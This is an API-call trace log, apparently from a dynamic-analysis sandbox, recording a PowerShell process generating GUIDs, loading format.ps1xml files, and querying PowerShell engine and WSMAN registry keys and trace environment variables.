	[0764.487] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x8e9ed91, Data2=0xc517, Data3=0x434d, Data4=([0]=0xab, [1]=0x39, [2]=0xd6, [3]=0xec, [4]=0xb2, [5]=0x49, [6]=0x76, [7]=0x4b))) returned 0x0
	[0764.487] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x15e028db, Data2=0x6f7c, Data3=0x448f, Data4=([0]=0x8c, [1]=0xcc, [2]=0x16, [3]=0x3e, [4]=0x37, [5]=0xb6, [6]=0x27, [7]=0xb9))) returned 0x0
	[0764.487] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x7fcb8765, Data2=0x7959, Data3=0x4e65, Data4=([0]=0xb6, [1]=0xb5, [2]=0x36, [3]=0x24, [4]=0xab, [5]=0xd7, [6]=0xf6, [7]=0x99))) returned 0x0
	[0764.488] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x2b3971d7, Data2=0x718f, Data3=0x4683, Data4=([0]=0x9d, [1]=0xc, [2]=0xd4, [3]=0x2e, [4]=0xd3, [5]=0x78, [6]=0x28, [7]=0xb2))) returned 0x0
	[0764.488] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x42f6be01, Data2=0xdc0e, Data3=0x498f, Data4=([0]=0xa1, [1]=0xd5, [2]=0x10, [3]=0x7c, [4]=0x85, [5]=0x21, [6]=0x22, [7]=0xff))) returned 0x0
	[0764.488] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xbcfd7096, Data2=0x79fb, Data3=0x4c81, Data4=([0]=0x83, [1]=0x4a, [2]=0x81, [3]=0x66, [4]=0x3f, [5]=0xef, [6]=0xee, [7]=0x9c))) returned 0x0
	[0764.488] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x326c0d94, Data2=0xeed1, Data3=0x4e73, Data4=([0]=0x99, [1]=0x11, [2]=0x55, [3]=0x87, [4]=0x9d, [5]=0x0, [6]=0xa, [7]=0x34))) returned 0x0
	[0764.489] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x872883f0, Data2=0x2c61, Data3=0x4279, Data4=([0]=0x84, [1]=0xd2, [2]=0xbe, [3]=0x45, [4]=0x63, [5]=0xfe, [6]=0x12, [7]=0x53))) returned 0x0
	[0764.489] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xfb1df4f1, Data2=0x92ac, Data3=0x4a5d, Data4=([0]=0x98, [1]=0xd2, [2]=0x1b, [3]=0xfa, [4]=0x43, [5]=0x2f, [6]=0xa, [7]=0x43))) returned 0x0
	[0764.489] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x10c07653, Data2=0x1b04, Data3=0x4b76, Data4=([0]=0x93, [1]=0x83, [2]=0x6f, [3]=0x35, [4]=0xa0, [5]=0x87, [6]=0x5a, [7]=0x21))) returned 0x0
	[0764.489] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xfab32c87, Data2=0x7e10, Data3=0x471f, Data4=([0]=0xac, [1]=0xf5, [2]=0xdc, [3]=0xf6, [4]=0xd5, [5]=0x18, [6]=0x1f, [7]=0x83))) returned 0x0
	[0764.489] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xdcc89201, Data2=0xe8b1, Data3=0x4593, Data4=([0]=0x96, [1]=0xc2, [2]=0x1c, [3]=0x28, [4]=0xdc, [5]=0x62, [6]=0x7d, [7]=0x1e))) returned 0x0
	[0764.490] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x625cc5a2, Data2=0x64c, Data3=0x4ce2, Data4=([0]=0xa5, [1]=0x1e, [2]=0xbc, [3]=0x1c, [4]=0xce, [5]=0x3e, [6]=0x71, [7]=0xd5))) returned 0x0
	[0764.490] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xe8208c57, Data2=0xb425, Data3=0x4d54, Data4=([0]=0xb3, [1]=0x94, [2]=0xaf, [3]=0x3d, [4]=0x59, [5]=0x3, [6]=0x22, [7]=0xdb))) returned 0x0
	[0764.490] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xecd6a82d, Data2=0x7977, Data3=0x4d2e, Data4=([0]=0x9f, [1]=0x9d, [2]=0x23, [3]=0xd8, [4]=0x95, [5]=0x64, [6]=0x72, [7]=0x4a))) returned 0x0
	[0764.490] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x3631661c, Data2=0x784, Data3=0x4cd0, Data4=([0]=0x94, [1]=0x75, [2]=0xf0, [3]=0x99, [4]=0xa0, [5]=0x82, [6]=0xcb, [7]=0xc8))) returned 0x0
	[0764.490] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x9a444eb9, Data2=0x3e0b, Data3=0x41b5, Data4=([0]=0xbe, [1]=0xaf, [2]=0xe9, [3]=0xe0, [4]=0x3, [5]=0x75, [6]=0x9f, [7]=0x90))) returned 0x0
	[0764.490] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xc8cf1bc3, Data2=0xd31b, Data3=0x4ccb, Data4=([0]=0x8a, [1]=0x2, [2]=0x36, [3]=0x35, [4]=0x63, [5]=0x8a, [6]=0x59, [7]=0x19))) returned 0x0
	[0764.491] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x9589aafc, Data2=0xac56, Data3=0x4eea, Data4=([0]=0xbf, [1]=0x64, [2]=0x74, [3]=0x37, [4]=0xee, [5]=0x44, [6]=0xab, [7]=0x6b))) returned 0x0
	[0764.491] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xc887a22f, Data2=0xad28, Data3=0x405b, Data4=([0]=0xaa, [1]=0x63, [2]=0xc1, [3]=0xe7, [4]=0xdf, [5]=0x90, [6]=0xeb, [7]=0x6c))) returned 0x0
	[0764.491] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xbdfba800, Data2=0x3729, Data3=0x4b02, Data4=([0]=0x95, [1]=0x87, [2]=0xa3, [3]=0x6e, [4]=0xa, [5]=0x64, [6]=0x2, [7]=0xc1))) returned 0x0
	[0764.498] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x3a8782a7, Data2=0x8294, Data3=0x4bce, Data4=([0]=0x85, [1]=0xf6, [2]=0x98, [3]=0x74, [4]=0xaa, [5]=0x87, [6]=0x75, [7]=0x4c))) returned 0x0
	[0764.498] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x9d93704c, Data2=0xd3ce, Data3=0x478d, Data4=([0]=0xba, [1]=0x9e, [2]=0x5f, [3]=0x2d, [4]=0x41, [5]=0x4, [6]=0x45, [7]=0xd7))) returned 0x0
	[0764.498] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x886094e8, Data2=0xdf49, Data3=0x4385, Data4=([0]=0xa5, [1]=0xb2, [2]=0x13, [3]=0x5f, [4]=0xb2, [5]=0x23, [6]=0xb7, [7]=0xb4))) returned 0x0
	[0764.499] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xda00a73f, Data2=0x8806, Data3=0x4418, Data4=([0]=0xba, [1]=0xee, [2]=0xc7, [3]=0xeb, [4]=0x78, [5]=0x2d, [6]=0xc2, [7]=0x6b))) returned 0x0
	[0764.499] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x6ecfdb6c, Data2=0x83b5, Data3=0x4960, Data4=([0]=0x8f, [1]=0x22, [2]=0x91, [3]=0x2, [4]=0x54, [5]=0xbe, [6]=0x9a, [7]=0xf9))) returned 0x0
	[0764.499] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xaf407509, Data2=0x2853, Data3=0x430a, Data4=([0]=0xac, [1]=0x81, [2]=0x7c, [3]=0x8a, [4]=0x9b, [5]=0xcb, [6]=0x65, [7]=0x5f))) returned 0x0
	[0764.499] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x71324a5d, Data2=0xadd4, Data3=0x4218, Data4=([0]=0xa8, [1]=0xab, [2]=0x66, [3]=0x3e, [4]=0x23, [5]=0x1d, [6]=0x19, [7]=0xbb))) returned 0x0
	[0764.499] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x23e5055b, Data2=0x5f6a, Data3=0x41c8, Data4=([0]=0x9d, [1]=0x5f, [2]=0xa, [3]=0x6b, [4]=0x2b, [5]=0xf, [6]=0x98, [7]=0xc8))) returned 0x0
	[0764.499] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xbc07ce90, Data2=0x415d, Data3=0x44fc, Data4=([0]=0x8f, [1]=0x6a, [2]=0xf3, [3]=0xf, [4]=0x49, [5]=0x1c, [6]=0x9e, [7]=0x4f))) returned 0x0
	[0764.500] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x263aeb39, Data2=0x27b1, Data3=0x45ae, Data4=([0]=0x87, [1]=0xd2, [2]=0xd0, [3]=0x75, [4]=0x40, [5]=0x35, [6]=0xdd, [7]=0x67))) returned 0x0
	[0764.500] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xd8e36034, Data2=0xc774, Data3=0x4c7d, Data4=([0]=0xad, [1]=0xc, [2]=0x6, [3]=0x12, [4]=0xf7, [5]=0xac, [6]=0xc, [7]=0xd2))) returned 0x0
	[0764.500] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x1e9b604a, Data2=0x1d8f, Data3=0x45a5, Data4=([0]=0x97, [1]=0x61, [2]=0xf6, [3]=0x3e, [4]=0x7f, [5]=0x83, [6]=0xc0, [7]=0xfb))) returned 0x0
	[0764.500] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xaab6041d, Data2=0x3aa5, Data3=0x4183, Data4=([0]=0xba, [1]=0x68, [2]=0x88, [3]=0xdc, [4]=0x22, [5]=0x83, [6]=0xd8, [7]=0x28))) returned 0x0
	[0764.500] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xfc948b90, Data2=0x8059, Data3=0x47b9, Data4=([0]=0x89, [1]=0x36, [2]=0x50, [3]=0xac, [4]=0x3, [5]=0xf3, [6]=0x5e, [7]=0x42))) returned 0x0
	[0764.500] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x4b10b05e, Data2=0x852f, Data3=0x485f, Data4=([0]=0xae, [1]=0xdd, [2]=0x6b, [3]=0x25, [4]=0x7d, [5]=0x35, [6]=0xb4, [7]=0xc1))) returned 0x0
	[0764.511] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0764.512] GetFileType (hFile=0x314) returned 0x1
	[0764.512] SetErrorMode (uMode=0x1) returned 0x1
	[0764.512] GetFileType (hFile=0x314) returned 0x1
	[0764.512] ReadFile (in: hFile=0x314, lpBuffer=0x2fbaa58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x2fbaa58*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0765.795] ReadFile (in: hFile=0x314, lpBuffer=0x2fbaa58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x2fbaa58*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0765.796] ReadFile (in: hFile=0x314, lpBuffer=0x2fbaa58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x2fbaa58*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0765.796] ReadFile (in: hFile=0x314, lpBuffer=0x2fbaa58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x2fbaa58*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0765.796] ReadFile (in: hFile=0x314, lpBuffer=0x2fbaa58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x2fbaa58*, lpNumberOfBytesRead=0x14cd18*=0x8b4, lpOverlapped=0x0) returned 1
	[0765.796] ReadFile (in: hFile=0x314, lpBuffer=0x2fb9e74, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x2fb9e74*, lpNumberOfBytesRead=0x14cd18*=0x0, lpOverlapped=0x0) returned 1
	[0765.796] ReadFile (in: hFile=0x314, lpBuffer=0x2fbaa58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x2fbaa58*, lpNumberOfBytesRead=0x14cd18*=0x0, lpOverlapped=0x0) returned 1
	[0765.797] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cda8 | out: phkResult=0x14cda8*=0x314) returned 0x0
	[0765.797] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cd2c, lpData=0x0, lpcbData=0x14cd28*=0x0 | out: lpType=0x14cd2c*=0x1, lpData=0x0, lpcbData=0x14cd28*=0x56) returned 0x0
	[0765.797] CoTaskMemAlloc (cb=0x5a) returned 0x1b73d620
	[0765.797] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ccfc, lpData=0x1b73d620, lpcbData=0x14ccf8*=0x56 | out: lpType=0x14ccfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14ccf8*=0x56) returned 0x0
	[0765.797] CoTaskMemFree (pv=0x1b73d620) 
	[0765.797] RegCloseKey (hKey=0x314) returned 0x0
	[0765.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0765.797] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0765.798] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x4da4c527, Data2=0x7afb, Data3=0x4d16, Data4=([0]=0x85, [1]=0xd7, [2]=0x80, [3]=0x96, [4]=0xb2, [5]=0x21, [6]=0x34, [7]=0xb7))) returned 0x0
	[0765.798] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x8bc66302, Data2=0xa733, Data3=0x4b31, Data4=([0]=0x98, [1]=0x92, [2]=0x2b, [3]=0x57, [4]=0x2a, [5]=0x1, [6]=0x32, [7]=0x7))) returned 0x0
	[0765.798] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0765.798] GetFileType (hFile=0x314) returned 0x1
	[0765.798] SetErrorMode (uMode=0x1) returned 0x1
	[0765.799] GetFileType (hFile=0x314) returned 0x1
	[0765.799] ReadFile (in: hFile=0x314, lpBuffer=0x2ff8840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x2ff8840*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0765.799] ReadFile (in: hFile=0x314, lpBuffer=0x2ff8840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x2ff8840*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0765.800] ReadFile (in: hFile=0x314, lpBuffer=0x2ff8840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x2ff8840*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0765.800] ReadFile (in: hFile=0x314, lpBuffer=0x2ff8840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x2ff8840*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0765.800] ReadFile (in: hFile=0x314, lpBuffer=0x2ff8840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x2ff8840*, lpNumberOfBytesRead=0x14cd18*=0xe98, lpOverlapped=0x0) returned 1
	[0765.800] ReadFile (in: hFile=0x314, lpBuffer=0x2ff7e40, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x2ff7e40*, lpNumberOfBytesRead=0x14cd18*=0x0, lpOverlapped=0x0) returned 1
	[0765.800] ReadFile (in: hFile=0x314, lpBuffer=0x2ff8840, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x2ff8840*, lpNumberOfBytesRead=0x14cd18*=0x0, lpOverlapped=0x0) returned 1
	[0765.801] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cda8 | out: phkResult=0x14cda8*=0x314) returned 0x0
	[0765.801] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cd2c, lpData=0x0, lpcbData=0x14cd28*=0x0 | out: lpType=0x14cd2c*=0x1, lpData=0x0, lpcbData=0x14cd28*=0x56) returned 0x0
	[0765.801] CoTaskMemAlloc (cb=0x5a) returned 0x1b73d620
	[0765.801] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ccfc, lpData=0x1b73d620, lpcbData=0x14ccf8*=0x56 | out: lpType=0x14ccfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14ccf8*=0x56) returned 0x0
	[0765.801] CoTaskMemFree (pv=0x1b73d620) 
	[0765.801] RegCloseKey (hKey=0x314) returned 0x0
	[0765.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0765.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0765.802] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xefcbc25b, Data2=0x6c33, Data3=0x4433, Data4=([0]=0x85, [1]=0x82, [2]=0x1b, [3]=0x15, [4]=0x87, [5]=0x9d, [6]=0x68, [7]=0x10))) returned 0x0
	[0765.802] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x46534fff, Data2=0x7cf7, Data3=0x433a, Data4=([0]=0xb4, [1]=0x81, [2]=0x9e, [3]=0xd, [4]=0x1a, [5]=0x20, [6]=0x89, [7]=0x95))) returned 0x0
	[0765.814] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0765.814] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0765.814] CoTaskMemFree (pv=0x2b17f0) 
	[0765.815] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0765.815] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0765.815] CoTaskMemFree (pv=0x2b17f0) 
	[0765.815] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0765.815] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0765.815] CoTaskMemFree (pv=0x2b17f0) 
	[0765.815] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0765.815] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0765.816] CoTaskMemFree (pv=0x2b17f0) 
	[0765.818] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0765.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0765.818] CoTaskMemFree (pv=0x2b17f0) 
	[0765.819] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0765.819] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0765.819] CoTaskMemFree (pv=0x2b17f0) 
	[0765.819] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
	[0765.819] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b17f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0765.820] CoTaskMemFree (pv=0x2b17f0) 
	[0765.823] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cfb8 | out: phkResult=0x14cfb8*=0x314) returned 0x0
	[0765.824] RegQueryInfoKeyW (in: hKey=0x314, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14cebc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ceb8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14cebc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ceb8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0765.824] CoTaskMemFree (pv=0x0) 
	[0765.825] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0765.825] RegEnumValueW (in: hKey=0x314, dwIndex=0x0, lpValueName=0x2564a0, lpcchValueName=0x14cf68, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14cf68, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0765.825] CoTaskMemFree (pv=0x2564a0) 
	[0765.825] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0765.825] RegEnumValueW (in: hKey=0x314, dwIndex=0x1, lpValueName=0x2564a0, lpcchValueName=0x14cf68, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14cf68, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0765.825] CoTaskMemFree (pv=0x2564a0) 
	[0765.825] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0765.825] RegEnumValueW (in: hKey=0x314, dwIndex=0x2, lpValueName=0x2564a0, lpcchValueName=0x14cf68, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x14cf68, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0765.825] CoTaskMemFree (pv=0x2564a0) 
	[0765.825] RegQueryValueExW (in: hKey=0x314, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14cf4c, lpData=0x0, lpcbData=0x14cf48*=0x0 | out: lpType=0x14cf4c*=0x1, lpData=0x0, lpcbData=0x14cf48*=0x8) returned 0x0
	[0765.826] CoTaskMemAlloc (cb=0xc) returned 0x2c8430
	[0765.826] RegQueryValueExW (in: hKey=0x314, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14cf1c, lpData=0x2c8430, lpcbData=0x14cf18*=0x8 | out: lpType=0x14cf1c*=0x1, lpData="2.0", lpcbData=0x14cf18*=0x8) returned 0x0
	[0765.826] CoTaskMemFree (pv=0x2c8430) 
	[0783.086] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cf08 | out: phkResult=0x14cf08*=0x314) returned 0x0
	[0783.086] RegQueryInfoKeyW (in: hKey=0x314, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14ce0c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ce08, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14ce0c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14ce08*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0783.086] CoTaskMemFree (pv=0x0) 
	[0783.086] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0783.086] RegEnumValueW (in: hKey=0x314, dwIndex=0x0, lpValueName=0x2564a0, lpcchValueName=0x14ceb8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14ceb8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0783.086] CoTaskMemFree (pv=0x2564a0) 
	[0783.086] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0783.086] RegEnumValueW (in: hKey=0x314, dwIndex=0x1, lpValueName=0x2564a0, lpcchValueName=0x14ceb8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14ceb8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0783.086] CoTaskMemFree (pv=0x2564a0) 
	[0783.086] CoTaskMemAlloc (cb=0x204) returned 0x2564a0
	[0783.086] RegEnumValueW (in: hKey=0x314, dwIndex=0x2, lpValueName=0x2564a0, lpcchValueName=0x14ceb8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x14ceb8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0783.087] CoTaskMemFree (pv=0x2564a0) 
	[0783.087] RegQueryValueExW (in: hKey=0x314, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14ce9c, lpData=0x0, lpcbData=0x14ce98*=0x0 | out: lpType=0x14ce9c*=0x1, lpData=0x0, lpcbData=0x14ce98*=0x8) returned 0x0
	[0783.087] CoTaskMemAlloc (cb=0xc) returned 0x2c7fd0
	[0783.087] RegQueryValueExW (in: hKey=0x314, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14ce6c, lpData=0x2c7fd0, lpcbData=0x14ce68*=0x8 | out: lpType=0x14ce6c*=0x1, lpData="2.0", lpcbData=0x14ce68*=0x8) returned 0x0
	[0783.087] CoTaskMemFree (pv=0x2c7fd0) 
	[0783.088] CoTaskMemAlloc (cb=0x104) returned 0x2b17f0
